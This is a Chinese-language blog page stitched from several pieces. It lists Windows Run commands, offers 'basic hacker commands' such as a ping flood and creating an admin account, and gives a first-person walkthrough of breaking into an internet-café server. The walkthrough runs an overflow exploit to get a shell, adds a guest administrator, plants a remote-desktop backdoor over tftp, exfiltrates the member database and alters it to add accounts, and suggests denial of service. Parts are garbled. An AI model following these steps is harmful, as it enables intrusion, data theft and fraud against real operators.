winver---------檢查windows版本
開啟windows管理體系結構
wupdmgr--------windows更新程式
wscript--------windows指令碼宿主設定
write寫字板winmsd---------系統資訊
wiaacmgr-------掃瞄器和照相機嚮導
winchat--------xp自帶區域網聊天
顯示記憶體使用情況
系統配置實用程式
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc遠端桌面連線
mplayer2-------****機
magnify--------放大鏡實用程式
mmc開啟控制台
mobsync--------同步命令
dxdiag---------檢查directx資訊
drwtsn32------ 系統醫生
裝置管理器
磁碟碎片整理程式
磁碟管理實用程式
dcomcnfg-------開啟系統元件服務
ddeshare-------開啟dde共享設定
***play--------*****器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------開啟記事本
nslookup-------網路管理的工具嚮導
ntbackup-------系統備份和還原
narrator-------螢幕"講述人"
移動儲存管理器
移動儲存管理員操作請求
netstat -an----(tc)命令檢查介面
syncapp--------建立乙個公文包
sysedit--------系統配置編輯器
si**erif-------檔案簽名驗證程式
sndrec32-------錄音機
shrpubw--------建立共享資料夾
本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼本地服務設定
sndvol32-------音量控制程式
系統檔案檢查器
sfc /scannow---windows檔案保護
tsshutdn-------60秒倒計時關機命令
tourstart------xp簡介(安裝完成後出現的漫遊xp程式)
taskmgr--------任務管理器
eventvwr-------事件檢視器
eudcedit-------造字程式
explorer-------開啟資源管理器
packager-------物件包裝程式
計算機效能監測程式
progman--------程式管理器
登錄檔組策略結果集
regedt32-------登錄檔編輯器
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll檔案執行
regsvr32 /u 取消zip支援
命令提示符
磁碟檢查
證書管理實用程式
calc啟動計算器
charmap--------啟動字元對映表
cliconfg-------sql server 客戶端網路實用程式
clipbrd--------剪貼簿檢視器
conf啟動netmeeting
計算機管理
cleanmgr-------垃圾整理
索引服務程式
osk開啟螢幕鍵盤
odbcad32-------odbc資料來源管理器
oobe/msoobe /a----檢查xp是否啟用
本機使用者和組
logoff---------登出命令
iexpress-------木馬**工具,系統自帶
nslookup-------ip位址偵測器
共享資料夾管理器
utilman--------輔助工具管理器
組策略winnt命令大全
這些都是學黑客的基本入門命令:
win2000網路命令初步
1】ping
用來測試網路是否建立連線,獲取ip位址,也可以用來攻擊
ping -l 65500 -t 127.0.0.0『對某個位址連續傳送大小為65500大小的資料報,一直到它宕機,對98使用較好
2】netstat -a
檢視自己開的埠,常常用來手工檢視是否中了木馬,或者黑客程式
3】netstat -n
檢視自己機器正在和哪些機器的哪個埠進行連線
4】ftp
檔案傳送協議命令,與對方機器連線後上傳和**檔案
**對方的東西的格式:
get *.* c:\
上傳檔案:
put c:\*.*
5】net use
1 ipc$連線
net use \\127.0.0.1\ipc$ "123" /user:"admin"
密碼為123 使用者名稱 admin
2 退出ipc$
net use \127.0.0.1\ips$ /delte
3 把對方的共享的資料夾對映
net use z: \\127.0.0.1\c$
6】net time
檢視對方時間
net time \\127.0.0.1
7】指定時間執行對方機器中的程式
at \\127.0.0.1 12:30 *.exe
8】telnet
與對方做遠端連線
一般需要使用者名稱和密碼,你在它的機器安裝了木馬就簡單了
telnet 【ip】 【埠】
9】net user
新增使用者命令
net user netdemon 123 /add
新增乙個使用者名為netdemon密碼為123的使用者
啟用guest
netuser guest /active:yes
10】提公升許可權
ner localgroup administrators netdemon /add
把netdemon提公升為管理員
11】net start
檢視機器開放的服務
可以啟動服務
net start telnet
啟動telnet服務
12】net stop
停止服務
net stop telnet
用來關閉服務
13】iisreset /reboot
重啟機器2k
14】finger
檢視對方最近有那些使用者登陸用來得到對方的使用者名稱
figer username @host
15】ipconfig
查機器有多少網絡卡:檢視本機器ip位址
入侵網咖伺服器!!!!!!
這是本人從別的地方貼上過來的,如果不行的話,可就不要怪我了喲!!!
宣告:本文只是告訴你可以這樣進入一台網咖伺服器,並沒有慫恿的意思,任何由本文引起的破壞網咖秩序的行為和作者與作者所在學校無關。本文可自由**,但請尊重作者版權,保持文章完整。
一直有寫些東西的衝動,只是太懶,從前寫些在網咖免費上網的東東,現在想想是該換些別的。有些東西放了太久很容易過時的。本文所提及的工具都可以在網上找到。
一、確定目標
首先要確定要攻擊的目標,即網咖伺服器的ip是多少。我所在網咖的客戶機裝的是windows 98+永珍2003,估計伺服器應該是windows 2k以上,用superscan 3.0掃了一下192.
168.0.1~192.
168.0.254這個範圍的135埠,只有乙個結果,往服務台瞅了一眼,確實只有一台伺服器沒有錯,目標確定。
二、開始入侵
既然伺服器開了135埠,那麼先用rpc服務緩衝區溢位漏洞溢位工具"rpc exploit gui"試試看,選擇目標為win2k(all)和winxp(all)都沒有成功,或許是打了補丁,也可能是借助天網防火牆之類的對135埠做了限制。開啟superscan,掃了一下192.168.
0.100(剛才掃出的伺服器內部ip位址)的"1~500"埠,結果顯示伺服器開了21(ftp),80(http),135(location service),139(netbios),445(microsoft-ds)埠,在ie位址列內輸入"",有個共享目錄backup,開啟瀏覽了一遍,東西挺多,只是有個永珍2003的安裝程式讓我不至於太失望。返回superscan,可以看到結果欄裡顯示伺服器用的是iis5.
1,可以確定目標伺服器用的是windows xp,看來用webd**x溢位xp的機子是沒希望了,用x-scan掃瞄伺服器網頁,報告發現.idq/.ida對映的溢位漏洞。
騙人的。其實對於iis5.1無效,想過利用x-way窮舉目標伺服器的密碼,但是很費時,我沒有太多時間,便放棄了。
又試著對伺服器的進行溢位。由於對方防火牆的阻擋,測試失敗。win98的客戶機實在不能利用目標伺服器的139埠做些什麼。
用"rpc exploit gui"溢位伺服器的139、445埠的成功率太低。先冷靜一會兒,滿著看目標伺服器的**做的如何,隨便點了一會兒,是個利用realplayer**的**電影**,想起來了,該服務不是開了個554(**流)埠嘛!剛才用superscan掃瞄時忘了,現在補充確認一下。
再用real服務緩衝區溢位漏洞溢位工具"thcrealbad"試試。這個漏洞不是很著名,管理員有可能不知道,我心裡想著,一會兒,提示溢位成功,並要求我連線到其31337埠,我終於看到了曙光,telnet上去,成功獲得伺服器的shell。
先做個賬號,這要用到幾條命令:(括號內為註解,不要輸入)
net user guest /active:yes(啟用賬戶guest)
net user guest 12345(把賬戶guest的密碼設為12345)
net localgroup administrators /add guest(把賬戶guest加到administrators組,具有最高許可權,預設為guests組)
由於伺服器用的是winxp,因此對映網路驅動器的方法是不行了,**tftpd32並執行(自己去網上找),把本地變成一台ftp伺服器,ftp目錄設為c盤根目錄,**開3389用的)到c盤根目錄(ftp目錄設在**就**到**)。回到溢位shell,把傳到伺服器,執行"tftp -i 192.168.
0.50 get c:\windows\system\注:
192.168.0.
50為本地機),傳過來了,再執行"djxyxs"程式,對方的3389埠就要開了(還要重啟),後門製作好了以後,來竊取伺服器的會員資料庫(這是本文的重點),服務端一般是被裝在c盤的octopus目錄下,執行"tftp -i 192.168.0.
50 put c:\octopus\"(注:為永珍2003的會員資料庫),一盞茶的功夫(視資料庫的大小而定),資料庫**過來了,但是怎麼開啟呢?
可以用excel,但網咖裡不會裝這種玩意,記得伺服器的共享目錄backup裡有個永珍2003的安裝程式(在"百度"搜尋"永珍2003"可以找到),把它的服務端裝到本機d盤根目錄,用剛剛**到c盤的覆蓋掉本機"d:\octopus"目錄裡的空資料庫檔案,再執行服務端程式""可以看到本網咖的所有會員,接下來是自己新增會員,沒什麼好說的,可別告訴我你不會。再著是要把修改後的資料庫檔案傳回來,由於伺服器的永珍服務端是開著的,為避免發生衝突,切不可把修改過的資料庫檔案直接傳到目標的octopus目錄,要換一種方法,讓伺服器在重新啟動過程中替換掉那兩個檔案,方法如下:
1、編輯本機的在c盤的根目錄),刪掉所有內容。
2、輸入以下內容:(括號內為解釋,不要輸入)
@echo off(關閉螢幕回顯)
move c:\ c:\octopus(將本機c盤的資料庫檔案替換掉伺服器裡的資料庫檔案)
3、回到伺服器的shell,執行"tftp -i 192.168.0.50 get c:\"(用我們的自啟動檔案覆蓋掉伺服器的
4、最後是把修改過的資料庫檔案傳到伺服器,執行"tftp -i 192.168.0.50 get c:\"
接下來只需叫管理員把伺服器重啟一下就可以了(呵呵!管理員會聽你的嗎?)。
xp自帶乙個重啟的命令(shutdown),我在溢位的shell裡執行"shutdown -r"後,提示"許可權不夠,客戶機不能執行重啟命令",算了吧!心急的可以來個拒絕服務攻擊。本篇寫的確實挺亂的,沒有什麼技術性可言,僅供一些人參考,寫得不好之處歡迎賜教.
- 作者: liufusan 2023年01月17日, 星期一 23:43 回覆(0) | 引用(0) 加入博採
最詳細的黑客教程
如果你想學一些東東的話,一定要看這兒喲,就算你不想當黑客,你總要為你的電腦著想吧,來吧,到這兒來看看吧
第四章------關於命令的使用
簡單說明:
windowsnt/2000下有豐富的cmd可供使用,其作用也是巨大的。完全值得去熟練掌握她它們。windows2000本身就提供了詳細的命令幫助。
在開始選單--》幫助中可以搜尋到"windows 2000 命令參考"。強烈建議各位新手花些時間仔細看一遍。裝了比如iis等軟體,就會有新的命令(iisreset),在命令列方式下加/?
或-h引數可以檢視幫助,其他內建的命令當然也可以。還有就是掌握一些常用的dos命令也是非常有必要的。因為winsows不管發展到哪一天,它也都不可能取代dos,至少現在還不行。
net命令更是最常用的網路命令,想做乙個**,更是你所必需掌握的。掌握一些linux命令也是很有必要的。希望下面的資料對大家有所幫助。
電腦開始「執行」命令大全
在window作業系統的開始 執行或者使用快捷鍵 window鍵 r鍵,即可調出執行視窗。注意 以下命令win10中或許存在某些不能執行的情況,但絕大部分都可以。組策略錄音機 位址偵測器,是乙個監測網路中dns伺服器是否能正確實現網域名稱解析的命令列工具。它在windowsnt 2000 xp中均可...
win7執行命令大全
cleanmgr 開啟磁碟清理工具 計算機管理 conf 啟動 netmeeting charmap 啟動字元對映表 calc 啟動計算器 磁碟檢查 命令提示符 證書管理實用程式 cliconfg sql server 客戶端網路實用程式clipbrd 剪貼簿檢視器 索引服務程式 play 器 磁碟...
電腦義診執行規範
義診活動當日執行規範 1場地布置 1.1搭建帳篷 第一步 依次鋪紅毯 共4塊,鋪成4公尺 5公尺的形狀 然後在紅毯中心位置把帳篷放平 第二步 二人各站一邊,雙手按圖將小管往上抬,把帳篷拉開一些。第三步 把四角的帳篷裙邊布往上面翻開,露出腳上的按鈕 第四步 操作人員進入到帳篷裡面,首先將乙隻手按住帳篷...